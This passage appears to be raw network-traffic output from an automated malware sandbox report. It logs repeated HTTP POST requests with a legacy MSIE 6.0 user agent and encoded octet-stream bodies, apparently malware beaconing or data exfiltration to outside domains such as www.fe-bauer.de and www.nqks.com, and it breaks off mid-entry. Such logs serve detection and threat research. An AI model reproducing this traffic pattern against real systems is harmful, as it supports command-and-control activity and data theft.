65KY4S1Asf58kzqUJCNmD+awOzIbe04LseOMyB1yHEECmm/fegbpJHtJkXrGLeRWS/qBvIyi2AENRK2cWoI/yBDkzciJUpLobxySmEFog4KIAs61mugc8DbONiXnrgmeTdFDGys8trhWZtmFM18PFP9TBEjgwQr2YKyZVR89aXUgGz6W1HJnhk5CwlsSA/j2YRRbdVMBJgLeHMRYntVO0T3cNMsJqjIbKCobBb1oRbsebb5QKAG/mzPImlAS0OBGo+HkGC+fPerLAJvf7d8SCSGTuhzq7D5fX2EEXQcTykCUdMO52M/VHltjQIDRcPM2e08MPWT1Rq5ek4b093t9zGZz9d6nwy5obCkArbwXDqU8o4D+iustkVDTU9Lj5p6S17jRr1FO10WcaPhe/FUtnO01lxS9XLOtVfNEAvm4DNbIMKCmWH8CruPCfKQM/W13rpFAbKmoXqVgqRU6N/W1BsuWmPTLjNwd+gYAiLA8j6Rs4NrrqZqMZekwGO4BjGspHSv9J/xMxJ/FIoC4s1OcInX4Iw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1678431271.2814397Data Raw: 75 37 53 63 6e 30 6f 4d 79 50 34 49 4f 47 36 53 72 51 2b 33 46 41 33 63 2b 72 50 36 61 64 45 44 48 71 74 5a 35 6e 68 56 39 4a 6c 75 65 70 68 61 34 6f 76 6e 2f 52 34 79 36 59 72 4f 72 6b 79 6a 47 61 64 7a 76 41 6b 33 63 30 54 59 34 49 64 41 7a 4e 67 63 77 78 74 68 6d 44 76 57 45 43 36 42 6d 4f 39 50 64 71 56 5a 44 71 4b 73 61 30 36 7a 70 74 4c 55 74 65 4d 46 6a 48 69 6c 6a 41 5a 34 6d 35 55 4a 74 4b 54 79 67 4a 72 33 68 76 6d 58 67 4f 6a 33 37 38 48 4d 4f 62 4f 32 31 71 48 6b 71 62 51 56 79 46 58 52 2f 72 63 69 7a 49 31 32 6d 42 4e 49 63 74 59 32 61 6f 65 62 4c 66 66 4f 7a 38 66 61 4f 58 48 6c 6a 33 4f 6d 48 71 57 6a 35 63 6c 71 6f 2f 61 37 42 69 5a 31 67 32 6c 4f 37 4a 6a 70 6f 70 62 42 7a 41 31 6e 74 69 69 72 36 57 56 31 78 6b 56 68 73 61 69 47 67 77 75 49 4e 78 67 6c 72 2b 37 38 43 55 78 41 48 4a 30 6a 79 54 70 51 63 55 68 6b 72 58 64 35 2b 4c 75 64 69 71 38 34 43 58 70 4d 30 45 4f 50 4e 4d 65 74 68 79 30 54 75 62 2f 6e 45 6a 79 50 34 4b 35 38 58 36 2f 6b 68 36 7a 4a 58 47 48 48 68 30 50 4f 70 58 75 39 71 64 4c 47 4b 32 38 74 47 57 4d 58 35 75 69 67 33 54 73 56 2f 56 6c 7a 58 4a 77 55 75 41 4c 52 5a 46 6b 50 46 76 6a 71 62 6b 50 46 39 46 77 52 45 65 36 49 6b 37 53 68 53 70 44 6e 57 74 44 46 7a 71 42 61 75 59 5a 68 59 51 4a 44 66 43 66 75 4f 6d 36 49 48 33 64 68 43 39 36 41 53 74 62 33 55 31 6c 58 75 59 4b 76 54 56 69 37 4f 39 77 57 34 73 61 52 44 37 7a 72 6b 67 49 67 50 4d 32 49 7a 66 54 30 4e 59 54 45 32 56 4e 33 78 62 45 42 64 42 4d 6e 34 6d 65 69 48 38 7a 67 65 63 52 76 54 6d 7a 65 32 54 64 57 49 37 42 72 31 33 56 2b 65 42 73 72 77 4f 37 6f 53 31 45 57 4f 4f 4c 64 4c 39 2b 73 4e 56 56 35 69 76 4a 53 68 59 53 75 35 39 4c 33 72 4c 31 56 76 6d 4a 4c 73 53 38 37 54 65 45 73 78 30 71 59 39 43 75 76 6b 31 6d 73 38 42 79 78 4e 46 66 70 Data Ascii: u7Scn0oMyP4IOG6SrQ+3FA3c+rP6adEDHqtZ5nhV9Jluepha4ovn/R4y6YrOrkyjGadzvAk3c0TY4IdAzNgcwxthmDvWEC6BmO9PdqVZDqKsa06zptLUteMFjHiljAZ4m5UJtKTygJr3hvmXgOj378HMObO21qHkqbQVyFXR/rcizI12mBNIctY2aoebLffOz8faOXHlj3OmHqWj5clqo/a7BiZ1g2lO7JjpopbBzA1ntiir6WV1xkVhsaiGgwuINxglr+78CUxAHJ0jyTpQcUhkrXd5+Ludiq84CXpM0EOPNMethy0Tub/nEjyP4K58X6/kh6zJXGHHh0POpXu9qdLGK28tGWMX5uig3TsV/VlzXJwUuALRZFkPFvjqbkPF9FwREe6Ik7ShSpDnWtDFzqBauYZhYQJDfCfuOm6IH3dhC96AStb3U1lXuYKvTVi7O9wW4saRD7zrkgIgPM2IzfT0NYTE2VN3xbEBdBMn4meiH8zgecRvTmze2TdWI7Br13V+eBsrwO7oS1EWOOLdL9+sNVV5ivJShYSu59L3rL1VvmJLsS87TeEsx0qY9Cuvk1ms8ByxNFfp
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 58 54 38 77 79 52 55 34 46 50 2f 46 37 2b 51 72 2f 43 72 62 75 41 36 35 61 42 63 6a 42 62 39 72 47 61 37 31 6f 71 59 30 55 49 70 67 58 36 79 33 56 61 78 38 30 4b 73 7a 45 4f 6a 35 38 37 65 56 57 4b 39 6c 37 61 36 42 5a 48 6b 57 45 79 5a 69 39 47 79 4a 79 54 63 75 33 34 30 68 33 75 37 64 4e 78 77 75 38 36 2b 6e 6b 56 57 75 36 42 4d 37 48 37 4a 63 31 4f 50 6c 6c 5a 77 57 31 33 70 70 55 45 2b 69 6e 4e 37 63 47 7a 7a 74 58 58 56 47 2b 37 6c 59 35 56 33 61 44 6b 45 79 6f 6e 71 4a 73 45 46 56 57 39 77 67 7a 44 32 74 42 55 62 70 63 37 50 64 2b 4b 46 45 72 4e 4f 70 53 4f 6c 6b 39 76 6e 7a 52 6a 51 61 6f 69 41 33 42 54 6f 34 74 71 6d 4c 44 4f 4a 61 31 48 78 6f 36 39 35 57 67 4c 6c 31 67 6c 57 41 41 52 76 30 46 6f 33 72 43 52 42 39 49 51 44 51 59 65 43 4c 54 61 33 39 5a 49 6c 2b 4e 4a 53 6a 56 6f 4a 72 6c 58 64 4b 32 4b 6a 6b 42 4c 50 6d 39 62 4d 71 46 54 34 57 36 39 33 4c 32 33 2f 45 38 7a 73 44 7a 42 42 54 45 55 2f 66 74 63 47 63 74 5a 65 58 2b 4d 65 4c 31 54 41 56 63 48 6c 47 47 6e 6e 6b 77 51 31 75 75 51 57 54 41 4a 65 4b 51 76 4c 36 46 55 75 4a 2b 4d 56 35 6b 65 6f 46 4a 72 44 77 34 63 4d 6a 4f 76 4a 50 66 4b 66 44 4c 58 4c 59 6c 6a 43 64 31 4e 6e 35 58 6f 59 35 65 41 36 72 71 2f 63 2f 71 73 45 45 4e 65 6c 47 74 6f 66 65 75 30 39 35 34 4a 31 7a 7a 71 66 67 48 50 57 74 2f 6f 4c 41 4a 63 2b 47 2f 44 37 4b 67 68 4a 73 42 31 75 4c 4f 50 57 6d 78 31 49 51 38 38 5a 51 49 62 39 58 41 4e 46 52 79 54 66 62 66 56 72 38 55 43 62 5a 66 79 4c 51 74 2f 49 68 57 6d 45 50 4c 6a 56 74 5a 2f 57 31 59 2f 47 77 65 53 57 31 4f 39 6e 35 44 79 72 31 2b 46 36 45 35 2f 41 2b 37 2b 68 75 49 56 37 64 78 48 57 66 39 65 55 57 71 69 7a 2b 6c 61 79 76 53 4c 44 6d 76 4b 6c 66 67 59 53 4a Data Ascii: XT8wyRU4FP/F7+Qr/CrbuA65aBcjBb9rGa71oqY0UIpgX6y3Vax80KszEOj587eVWK9l7a6BZHkWEyZi9GyJyTcu340h3u7dNxwu86+nkVWu6BM7H7Jc1OPllZwW13ppUE+inN7cGzztXXVG+7lY5V3aDkEyonqJsEFVW9wgzD2tBUbpc7Pd+KFErNOpSOlk9vnzRjQaoiA3BTo4tqmLDOJa1Hxo695WgLl1glWAARv0Fo3rCRB9IQDQYeCLTa39ZIl+NJSjVoJrlXdK2KjkBLPm9bMqFT4W693L23/E8zsDzBBTEU/ftcGctZeX+MeL1TAVcHlGGnnkwQ1uuQWTAJeKQvL6FUuJ+MV5keoFJrDw4cMjOvJPfKfDLXLYljCd1Nn5XoY5eA6rq/c/qsEENelGtofeu0954J1zzqfgHPWt/oLAJc+G/D7KghJsB1uLOPWmx1IQ88ZQIb9XANFRyTfbfVr8UCbZfyLQt/IhWmEPLjVtZ/W1Y/GweSW1O9n5Dyr1+F6E5/A+7+huIV7dxHWf9eUWqiz+layvSLDmvKlfgYSJ
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 51 6b 5a 55 6e 4a 39 6a 49 2f 39 46 77 72 77 75 2f 6c 78 7a 42 53 67 54 51 6f 46 31 51 4b 48 4d 51 35 30 51 79 6e 7a 64 44 44 2f 6b 48 67 6a 56 6c 57 6d 31 42 65 4d 61 34 41 41 78 68 42 4f 4a 45 6c 4e 44 33 71 33 67 59 2b 64 76 2f 54 50 69 5a 7a 64 31 6e 64 41 6d 43 4a 64 64 64 4e 7a 6a 77 63 49 51 6d 4b 72 74 6e 65 78 66 46 6e 30 45 31 4d 67 35 34 4d 43 54 77 36 4e 7a 57 69 4c 6f 76 74 47 45 42 4f 66 72 6a 33 33 4c 59 58 53 42 7a 64 47 58 46 44 46 46 36 2b 63 70 46 44 36 71 44 49 56 33 37 4d 37 34 4f 42 61 36 68 6e 6c 51 4a 59 6b 46 57 4e 6b 70 4d 75 58 5a 65 33 43 58 77 63 5a 41 69 44 69 5a 78 59 70 4a 69 63 77 55 4b 73 66 61 4e 62 38 55 63 69 55 34 53 4f 66 67 46 74 65 6c 6b 6a 61 2f 67 7a 77 77 48 4f 6e 59 4c 6a 30 73 35 2b 6a 4d 54 57 74 6b 79 62 4c 59 7a 6d 4a 33 35 70 50 36 44 37 45 72 6d 69 2b 68 47 35 66 41 4f 4b 65 68 65 50 70 59 70 75 72 78 45 50 43 4f 45 55 52 5a 54 2f 6b 48 67 76 32 6c 64 78 39 49 2b 47 33 54 75 74 49 49 66 71 31 46 34 47 52 6f 52 68 4f 4a 4a 55 6b 4a 76 31 38 69 42 31 76 7a 49 34 6d 44 45 4f 58 76 57 76 6b 6a 4e 58 71 41 48 42 50 48 78 56 64 47 50 68 70 75 64 58 77 70 5a 46 70 75 4e 39 62 45 33 30 61 71 4e 32 59 42 45 52 78 34 54 6e 4f 43 53 58 75 32 33 51 34 41 31 55 6a 62 38 49 77 37 4b 75 78 69 39 31 54 76 77 50 2f 38 64 48 44 68 59 48 47 65 50 69 61 72 7a 47 39 61 30 4e 70 33 66 37 49 4c 36 6e 67 55 5a 72 59 71 67 6e 55 65 68 71 70 4c 2f 56 6b 4a 78 54 57 36 79 52 56 43 4e 48 73 37 4d 79 30 33 44 6e 75 50 33 50 6c 6b 45 50 76 58 6c 74 34 37 41 73 66 43 69 32 70 69 4d 7a 68 49 6e 68 59 33 73 35 56 56 66 49 6d 47 47 31 72 61 5a 47 32 44 67 77 6e 67 38 70 57 52 73 32 58 4c 6c 62 4c 6a 31 64 45 55 56 33 51 63 44 43 67 6d 65 77 3d 3d Data Ascii: QkZUnJ9jI/9Fwrwu/lxzBSgTQoF1QKHMQ50QynzdDD/kHgjVlWm1BeMa4AAxhBOJElND3q3gY+dv/TPiZzd1ndAmCJdddNzjwcIQmKrtnexfFn0E1Mg54MCTw6NzWiLovtGEBOfrj33LYXSBzdGXFDFF6+cpFD6qDIV37M74OBa6hnlQJYkFWNkpMuXZe3CXwcZAiDiZxYpJicwUKsfaNb8UciU4SOfgFtelkja/gzwwHOnYLj0s5+jMTWtkybLYzmJ35pP6D7Ermi+hG5fAOKehePpYpurxEPCOEURZT/kHgv2ldx9I+G3TutIIfq1F4GRoRhOJJUkJv18iB1vzI4mDEOXvWvkjNXqAHBPHxVdGPhpudXwpZFpuN9bE30aqN2YBERx4TnOCSXu23Q4A1Ujb8Iw7Kuxi91TvwP/8dHDhYHGePiarzG9a0Np3f7IL6ngUZrYqgnUehqpL/VkJxTW6yRVCNHs7My03DnuP3PlkEPvXlt47AsfCi2piMzhInhY3s5VVfImGG1raZG2Dgwng8pWRs2XLlbLj1dEUV3QcDCgmew==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 42 76 31 71 6d 57 68 4c 49 2f 2b 77 51 50 6f 54 4b 7a 64 74 6e 74 74 53 64 6a 74 77 67 76 46 4b 48 45 55 70 55 2b 70 6a 59 6a 37 34 66 72 53 50 63 36 37 2f 69 54 5a 34 43 44 53 75 73 30 39 45 6d 58 6d 33 4f 73 57 45 4d 2f 6b 75 4a 64 30 39 7a 37 51 65 6e 69 79 6e 64 37 52 55 63 73 46 75 50 65 56 54 35 6b 5a 30 39 42 2f 42 30 77 44 6d 71 50 51 4b 38 78 63 2b 42 45 73 67 61 4e 69 59 31 70 70 5a 45 69 59 57 43 66 37 4d 58 4f 71 7a 4b 62 61 38 57 57 65 37 78 5a 53 64 6c 38 54 71 42 56 5a 48 7a 2f 44 4b 78 50 44 52 4b 32 67 54 57 66 50 36 45 63 30 68 51 53 64 2b 4f 39 71 49 41 51 4a 6f 77 38 79 36 6d 47 41 63 64 45 74 32 69 55 30 6e 5a 58 56 33 6b 62 46 4d 52 2b 6c 74 78 56 6a 39 65 74 56 37 54 33 71 72 4b 78 39 49 4a 41 37 49 42 43 77 33 71 31 4e 2b 6b 62 37 58 38 59 5a 37 4c 71 39 47 61 66 2b 68 33 56 55 37 52 39 72 72 56 61 4c 6e 65 53 43 68 70 5a 57 4e 4f 4c 4f 59 65 31 37 53 66 73 78 4f 70 49 51 66 32 64 54 6a 61 38 47 58 74 2f 32 5a 48 44 46 4a 55 51 50 57 57 54 33 57 68 4f 4d 5a 41 70 52 75 79 48 4a 6b 66 74 4c 51 36 7a 76 41 57 67 47 32 62 67 35 34 56 6a 53 55 57 66 35 33 44 7a 71 76 30 51 78 54 58 61 35 75 64 33 6c 56 4f 46 43 33 4c 71 52 4e 53 44 42 46 66 4a 45 54 6f 4b 44 38 67 43 51 6d 30 4d 6e 4f 4c 4a 6b 44 53 49 4d 54 70 75 4b 45 68 6b 55 4e 66 37 39 59 52 2b 71 78 79 4d 7a 4e 43 48 4c 6e 53 32 76 6c 53 2f 73 77 4e 48 52 77 47 66 39 38 69 58 54 7a 38 51 47 31 32 54 66 41 66 59 64 5a 30 75 79 38 43 46 53 46 45 52 4c 69 6e 34 61 63 37 6b 76 42 4b 38 6b 41 39 44 59 62 54 65 42 53 55 78 69 2f 4a 37 53 65 2b 37 31 32 4e 5a 67 39 65 62 2f 61 35 30 77 57 47 67 75 7a 45 4c 36 54 78 77 32 45 6f 6a 42 39 62 59 63 3d Data Ascii: Bv1qmWhLI/+wQPoTKzdtnttSdjtwgvFKHEUpU+pjYj74frSPc67/iTZ4CDSus09EmXm3OsWEM/kuJd09z7Qeniynd7RUcsFuPeVT5kZ09B/B0wDmqPQK8xc+BEsgaNiY1ppZEiYWCf7MXOqzKba8WWe7xZSdl8TqBVZHz/DKxPDRK2gTWfP6Ec0hQSd+O9qIAQJow8y6mGAcdEt2iU0nZXV3kbFMR+ltxVj9etV7T3qrKx9IJA7IBCw3q1N+kb7X8YZ7Lq9Gaf+h3VU7R9rrVaLneSChpZWNOLOYe17SfsxOpIQf2dTja8GXt/2ZHDFJUQPWWT3WhOMZApRuyHJkftLQ6zvAWgG2bg54VjSUWf53Dzqv0QxTXa5ud3lVOFC3LqRNSDBFfJEToKD8gCQm0MnOLJkDSIMTpuKEhkUNf79YR+qxyMzNCHLnS2vlS/swNHRwGf98iXTz8QG12TfAfYdZ0uy8CFSFERLin4ac7kvBK8kA9DYbTeBSUxi/J7Se+712NZg9eb/a50wWGguzEL6Txw2EojB9bYc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 42 76 31 71 6d 57 68 4c 49 2f 2b 77 51 50 6f 54 4b 7a 64 74 6e 74 74 53 64 6a 74 77 67 76 46 4b 48 45 55 70 55 2b 70 6a 59 6a 37 34 66 72 53 50 63 36 37 2f 69 54 5a 34 43 44 53 75 73 30 39 45 6d 58 6d 33 4f 73 57 45 4d 2f 6b 75 4a 64 30 39 7a 37 51 65 6e 69 79 6e 64 37 52 55 63 73 46 75 50 65 56 54 35 6b 5a 30 39 42 2f 42 30 77 44 6d 71 50 51 4b 38 78 63 2b 42 45 73 67 61 4e 69 59 31 70 70 5a 45 69 59 57 43 66 37 4d 58 4f 71 7a 4b 62 61 38 57 57 65 37 78 5a 53 64 6c 38 54 71 42 56 5a 48 7a 2f 44 4b 78 50 44 52 4b 32 67 54 57 66 50 36 45 63 30 68 51 53 64 2b 4f 39 71 49 41 51 4a 6f 77 38 79 36 6d 47 41 63 64 45 74 32 69 55 30 6e 5a 58 56 33 6b 62 46 4d 52 2b 6c 74 78 56 6a 39 65 74 56 37 54 33 71 72 4b 78 39 49 4a 41 37 49 42 43 77 33 71 31 4e 2b 6b 62 37 58 38 59 5a 37 4c 71 39 47 61 66 2b 68 33 56 55 37 52 39 72 72 56 61 4c 6e 65 53 43 68 70 5a 57 4e 4f 4c 4f 59 65 31 37 53 66 73 78 4f 70 49 51 66 32 64 54 6a 61 38 47 58 74 2f 32 5a 48 44 46 4a 55 51 50 57 57 54 33 57 68 4f 4d 5a 41 70 52 75 79 48 4a 6b 66 74 4c 51 36 7a 76 41 57 67 47 32 62 67 35 34 56 6a 53 55 57 66 35 33 44 7a 71 76 30 51 78 54 58 61 35 75 64 33 6c 56 4f 46 43 33 4c 71 52 4e 53 44 42 46 66 4a 45 54 6f 4b 44 38 67 43 51 6d 30 4d 6e 4f 4c 4a 6b 44 53 49 4d 54 70 75 4b 45 68 6b 55 4e 66 37 39 59 52 2b 71 78 79 4d 7a 4e 43 48 4c 6e 53 32 76 6c 53 2f 73 77 4e 48 52 77 47 66 39 38 69 58 54 7a 38 51 47 31 32 54 66 41 66 59 64 5a 30 75 79 38 43 46 53 46 45 52 4c 69 6e 34 61 63 37 6b 76 42 4b 38 6b 41 39 44 59 62 54 65 42 53 55 78 69 2f 4a 37 53 65 2b 37 31 32 4e 5a 67 39 65 62 2f 61 35 30 77 57 47 67 75 7a 45 4c 36 54 78 77 32 45 6f 6a 42 39 62 59 63 3d Data Ascii: Bv1qmWhLI/+wQPoTKzdtnttSdjtwgvFKHEUpU+pjYj74frSPc67/iTZ4CDSus09EmXm3OsWEM/kuJd09z7Qeniynd7RUcsFuPeVT5kZ09B/B0wDmqPQK8xc+BEsgaNiY1ppZEiYWCf7MXOqzKba8WWe7xZSdl8TqBVZHz/DKxPDRK2gTWfP6Ec0hQSd+O9qIAQJow8y6mGAcdEt2iU0nZXV3kbFMR+ltxVj9etV7T3qrKx9IJA7IBCw3q1N+kb7X8YZ7Lq9Gaf+h3VU7R9rrVaLneSChpZWNOLOYe17SfsxOpIQf2dTja8GXt/2ZHDFJUQPWWT3WhOMZApRuyHJkftLQ6zvAWgG2bg54VjSUWf53Dzqv0QxTXa5ud3lVOFC3LqRNSDBFfJEToKD8gCQm0MnOLJkDSIMTpuKEhkUNf79YR+qxyMzNCHLnS2vlS/swNHRwGf98iXTz8QG12TfAfYdZ0uy8CFSFERLin4ac7kvBK8kA9DYbTeBSUxi/J7Se+712NZg9eb/a50wWGguzEL6Txw2EojB9bYc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 42 76 31 71 6d 57 68 4c 49 2f 2b 77 51 50 6f 54 4b 7a 64 74 6e 74 74 53 64 6a 74 77 67 76 46 4b 48 45 55 70 55 2b 70 6a 59 6a 37 34 66 72 53 50 63 36 37 2f 69 54 5a 34 43 44 53 75 73 30 39 45 6d 58 6d 33 4f 73 57 45 4d 2f 6b 75 4a 64 30 39 7a 37 51 65 6e 69 79 6e 64 37 52 55 63 73 46 75 50 65 56 54 35 6b 5a 30 39 42 2f 42 30 77 44 6d 71 50 51 4b 38 78 63 2b 42 45 73 67 61 4e 69 59 31 70 70 5a 45 69 59 57 43 66 37 4d 58 4f 71 7a 4b 62 61 38 57 57 65 37 78 5a 53 64 6c 38 54 71 42 56 5a 48 7a 2f 44 4b 78 50 44 52 4b 32 67 54 57 66 50 36 45 63 30 68 51 53 64 2b 4f 39 71 49 41 51 4a 6f 77 38 79 36 6d 47 41 63 64 45 74 32 69 55 30 6e 5a 58 56 33 6b 62 46 4d 52 2b 6c 74 78 56 6a 39 65 74 56 37 54 33 71 72 4b 78 39 49 4a 41 37 49 42 43 77 33 71 31 4e 2b 6b 62 37 58 38 59 5a 37 4c 71 39 47 61 66 2b 68 33 56 55 37 52 39 72 72 56 61 4c 6e 65 53 43 68 70 5a 57 4e 4f 4c 4f 59 65 31 37 53 66 73 78 4f 70 49 51 66 32 64 54 6a 61 38 47 58 74 2f 32 5a 48 44 46 4a 55 51 50 57 57 54 33 57 68 4f 4d 5a 41 70 52 75 79 48 4a 6b 66 74 4c 51 36 7a 76 41 57 67 47 32 62 67 35 34 56 6a 53 55 57 66 35 33 44 7a 71 76 30 51 78 54 58 61 35 75 64 33 6c 56 4f 46 43 33 4c 71 52 4e 53 44 42 46 66 4a 45 54 6f 4b 44 38 67 43 51 6d 30 4d 6e 4f 4c 4a 6b 44 53 49 4d 54 70 75 4b 45 68 6b 55 4e 66 37 39 59 52 2b 71 78 79 4d 7a 4e 43 48 4c 6e 53 32 76 6c 53 2f 73 77 4e 48 52 77 47 66 39 38 69 58 54 7a 38 51 47 31 32 54 66 41 66 59 64 5a 30 75 79 38 43 46 53 46 45 52 4c 69 6e 34 61 63 37 6b 76 42 4b 38 6b 41 39 44 59 62 54 65 42 53 55 78 69 2f 4a 37 53 65 2b 37 31 32 4e 5a 67 39 65 62 2f 61 35 30 77 57 47 67 75 7a 45 4c 36 54 78 77 32 45 6f 6a 42 39 62 59 63 3d Data Ascii: Bv1qmWhLI/+wQPoTKzdtnttSdjtwgvFKHEUpU+pjYj74frSPc67/iTZ4CDSus09EmXm3OsWEM/kuJd09z7Qeniynd7RUcsFuPeVT5kZ09B/B0wDmqPQK8xc+BEsgaNiY1ppZEiYWCf7MXOqzKba8WWe7xZSdl8TqBVZHz/DKxPDRK2gTWfP6Ec0hQSd+O9qIAQJow8y6mGAcdEt2iU0nZXV3kbFMR+ltxVj9etV7T3qrKx9IJA7IBCw3q1N+kb7X8YZ7Lq9Gaf+h3VU7R9rrVaLneSChpZWNOLOYe17SfsxOpIQf2dTja8GXt/2ZHDFJUQPWWT3WhOMZApRuyHJkftLQ6zvAWgG2bg54VjSUWf53Dzqv0QxTXa5ud3lVOFC3LqRNSDBFfJEToKD8gCQm0MnOLJkDSIMTpuKEhkUNf79YR+qxyMzNCHLnS2vlS/swNHRwGf98iXTz8QG12TfAfYdZ0uy8CFSFERLin4ac7kvBK8kA9DYbTeBSUxi/J7Se+712NZg9eb/a50wWGguzEL6Txw2EojB9bYc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 42 76 31 71 6d 57 68 4c 49 2f 2b 77 51 50 6f 54 4b 7a 64 74 6e 74 74 53 64 6a 74 77 67 76 46 4b 48 45 55 70 55 2b 70 6a 59 6a 37 34 66 72 53 50 63 36 37 2f 69 54 5a 34 43 44 53 75 73 30 39 45 6d 58 6d 33 4f 73 57 45 4d 2f 6b 75 4a 64 30 39 7a 37 51 65 6e 69 79 6e 64 37 52 55 63 73 46 75 50 65 56 54 35 6b 5a 30 39 42 2f 42 30 77 44 6d 71 50 51 4b 38 78 63 2b 42 45 73 67 61 4e 69 59 31 70 70 5a 45 69 59 57 43 66 37 4d 58 4f 71 7a 4b 62 61 38 57 57 65 37 78 5a 53 64 6c 38 54 71 42 56 5a 48 7a 2f 44 4b 78 50 44 52 4b 32 67 54 57 66 50 36 45 63 30 68 51 53 64 2b 4f 39 71 49 41 51 4a 6f 77 38 79 36 6d 47 41 63 64 45 74 32 69 55 30 6e 5a 58 56 33 6b 62 46 4d 52 2b 6c 74 78 56 6a 39 65 74 56 37 54 33 71 72 4b 78 39 49 4a 41 37 49 42 43 77 33 71 31 4e 2b 6b 62 37 58 38 59 5a 37 4c 71 39 47 61 66 2b 68 33 56 55 37 52 39 72 72 56 61 4c 6e 65 53 43 68 70 5a 57 4e 4f 4c 4f 59 65 31 37 53 66 73 78 4f 70 49 51 66 32 64 54 6a 61 38 47 58 74 2f 32 5a 48 44 46 4a 55 51 50 57 57 54 33 57 68 4f 4d 5a 41 70 52 75 79 48 4a 6b 66 74 4c 51 36 7a 76 41 57 67 47 32 62 67 35 34 56 6a 53 55 57 66 35 33 44 7a 71 76 30 51 78 54 58 61 35 75 64 33 6c 56 4f 46 43 33 4c 71 52 4e 53 44 42 46 66 4a 45 54 6f 4b 44 38 67 43 51 6d 30 4d 6e 4f 4c 4a 6b 44 53 49 4d 54 70 75 4b 45 68 6b 55 4e 66 37 39 59 52 2b 71 78 79 4d 7a 4e 43 48 4c 6e 53 32 76 6c 53 2f 73 77 4e 48 52 77 47 66 39 38 69 58 54 7a 38 51 47 31 32 54 66 41 66 59 64 5a 30 75 79 38 43 46 53 46 45 52 4c 69 6e 34 61 63 37 6b 76 42 4b 38 6b 41 39 44 59 62 54 65 42 53 55 78 69 2f 4a 37 53 65 2b 37 31 32 4e 5a 67 39 65 62 2f 61 35 30 77 57 47 67 75 7a 45 4c 36 54 78 77 32 45 6f 6a 42 39 62 59 63 3d Data Ascii: Bv1qmWhLI/+wQPoTKzdtnttSdjtwgvFKHEUpU+pjYj74frSPc67/iTZ4CDSus09EmXm3OsWEM/kuJd09z7Qeniynd7RUcsFuPeVT5kZ09B/B0wDmqPQK8xc+BEsgaNiY1ppZEiYWCf7MXOqzKba8WWe7xZSdl8TqBVZHz/DKxPDRK2gTWfP6Ec0hQSd+O9qIAQJow8y6mGAcdEt2iU0nZXV3kbFMR+ltxVj9etV7T3qrKx9IJA7IBCw3q1N+kb7X8YZ7Lq9Gaf+h3VU7R9rrVaLneSChpZWNOLOYe17SfsxOpIQf2dTja8GXt/2ZHDFJUQPWWT3WhOMZApRuyHJkftLQ6zvAWgG2bg54VjSUWf53Dzqv0QxTXa5ud3lVOFC3LqRNSDBFfJEToKD8gCQm0MnOLJkDSIMTpuKEhkUNf79YR+qxyMzNCHLnS2vlS/swNHRwGf98iXTz8QG12TfAfYdZ0uy8CFSFERLin4ac7kvBK8kA9DYbTeBSUxi/J7Se+712NZg9eb/a50wWGguzEL6Txw2EojB9bYc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 42 76 31 71 6d 57 68 4c 49 2f 2b 77 51 50 6f 54 4b 7a 64 74 6e 74 74 53 64 6a 74 77 67 76 46 4b 48 45 55 70 55 2b 70 6a 59 6a 37 34 66 72 53 50 63 36 37 2f 69 54 5a 34 43 44 53 75 73 30 39 45 6d 58 6d 33 4f 73 57 45 4d 2f 6b 75 4a 64 30 39 7a 37 51 65 6e 69 79 6e 64 37 52 55 63 73 46 75 50 65 56 54 35 6b 5a 30 39 42 2f 42 30 77 44 6d 71 50 51 4b 38 78 63 2b 42 45 73 67 61 4e 69 59 31 70 70 5a 45 69 59 57 43 66 37 4d 58 4f 71 7a 4b 62 61 38 57 57 65 37 78 5a 53 64 6c 38 54 71 42 56 5a 48 7a 2f 44 4b 78 50 44 52 4b 32 67 54 57 66 50 36 45 63 30 68 51 53 64 2b 4f 39 71 49 41 51 4a 6f 77 38 79 36 6d 47 41 63 64 45 74 32 69 55 30 6e 5a 58 56 33 6b 62 46 4d 52 2b 6c 74 78 56 6a 39 65 74 56 37 54 33 71 72 4b 78 39 49 4a 41 37 49 42 43 77 33 71 31 4e 2b 6b 62 37 58 38 59 5a 37 4c 71 39 47 61 66 2b 68 33 56 55 37 52 39 72 72 56 61 4c 6e 65 53 43 68 70 5a 57 4e 4f 4c 4f 59 65 31 37 53 66 73 78 4f 70 49 51 66 32 64 54 6a 61 38 47 58 74 2f 32 5a 48 44 46 4a 55 51 50 57 57 54 33 57 68 4f 4d 5a 41 70 52 75 79 48 4a 6b 66 74 4c 51 36 7a 76 41 57 67 47 32 62 67 35 34 56 6a 53 55 57 66 35 33 44 7a 71 76 